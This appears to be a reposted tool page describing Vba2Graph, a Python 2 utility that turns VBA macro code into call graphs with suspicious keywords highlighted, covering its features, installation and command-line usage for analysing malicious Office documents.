Vba2Graph – Generate Call Graphs From VBA Code, For Easier Analysis Of Malicious Documents

A tool for security researchers, who waste their time analyzing malicious Office macros.Generates a VBA call graph, with potential malicious keywords highlighted.Allows for quick analysis of malicous macros, and easy understanding of the execution flow.@MalwareCantFlyFeaturesKeyword highlightingVBA Properties supportExternal function declarion supportTricky macros with “_Change" execution triggersFancy color schemes!ProsPretty fastWorks well on most malicious macros observed in the wildConsStatic (dynamicaly resolved calls would not be recognized)ExamplesExample 1:Trickbot downloader – utilizes object Resize event as initial trigger, followed by TextBox_Change triggers.Example 2:Check out the Examples folder for more cases.InstallationInstall oletools:https://github.com/decalage2/oletools/wiki/InstallInstall Python Requirementspip2 install -r requirements.txtInstall GraphvizWindowsInstall Graphviz msi:https://graphviz.gitlab.io/_pages/Download/Download_windows.htmlAdd "dot.exe" to PATH env variable or just:set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\binMacbrew install graphvizUbuntusudo apt-get install graphvizArchsudo pacman -S graphvizUsageusage: vba2graph.py [-h] [-o OUTPUT] [-c {0,1,2,3}] (-i INPUT | -f FILE)optional arguments: -h, –help show this help message and exit -o OUTPUT, –output OUTPUT output folder (default: "output") -c {0,1,2,3}, –colors {0,1,2,3} color scheme number [0, 1, 2, 3] (default: 0 – B&W) -i INPUT, –input INPUT olevba generated file or .bas file -f FILE, –file FILE Office file with macrosUsage Examples (All Platforms)Only Python 2 is supported:# Generate call graph directly from an Office file with macros [tnx @doomedraven]python2 vba2graph.py -f malicious.doc -c 2 # Generate vba code using olevba then pipe it to vba2grapholevba malicious.doc | python2 vba2graph.py -c 1# Generate call graph from VBA codepython2 vba2graph.py -i vba_code.bas -o output_folderOutputYou’ll get 4 folders in your output folder:png: the actual graph image you are looking forsvg: same graph image, just in vector graphicsdot: the dot file which was used to create the graph imagebas: the VBA functions code that was recognized by the script (for debugging)Batch ProcessingMac/Linux:batch.sh script file is attached for running olevba and vba2graph on an input folder of malicious docs.Deletes output dir. use with caution.Download Vba2Graph

Link: http://feedproxy.google.com/~r/PentestTools/~3/nFNb7qSmnXo/vba2graph-generate-call-graphs-from-vba.html